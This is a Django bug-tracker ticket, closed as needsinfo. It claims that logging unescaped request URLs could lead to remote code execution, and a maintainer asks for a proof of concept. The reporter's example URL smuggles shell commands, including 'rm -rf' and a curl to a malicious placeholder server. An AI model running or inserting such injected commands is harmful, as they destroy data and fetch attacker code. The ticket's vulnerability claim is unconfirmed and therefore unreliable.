Opened 2 years ago
Closed 2 years ago
#33610 closed Bug (needsinfo)
Django does not escape the request url in default logging mechanism and may be vulnerable to remote code execution
| Reported by: | DJD | Owned by: | nobody |
|---|---|---|---|
| Component: | Utilities | Version: | 4.0 |
| Severity: | Normal | Keywords: | |
| Cc: | Triage Stage: | Unreviewed | |
| Has patch: | no | Needs documentation: | no |
| Needs tests: | no | Patch needs improvement: | no |
| Easy pickings: | no | UI/UX: | no |
Description
Issue:
When logging enabled in Django the log_response method in log.py of django.utils package logs the given url in the log file as it is without escaping the url which may lead to remote code execution.
For example:
An attacker hits the Django project with this url: <hostname>/cgi-bin;cd /var/temp;rm -rf <any folder>; curl <malicious remote server url>
In this case we can see the log file entry with warning (yes because of 404 not found error level is warning) with given url as it is. IMHO we should escape the request response logging so as to minimise the remote code execution possibilities
Note:
See TracTickets
for help on using tickets.
Please don't report security issues here! Contact security@… instead.
It's not clear how logging leads to a code execution but please send a full proof of concept to security@… and we can review.
Thanks.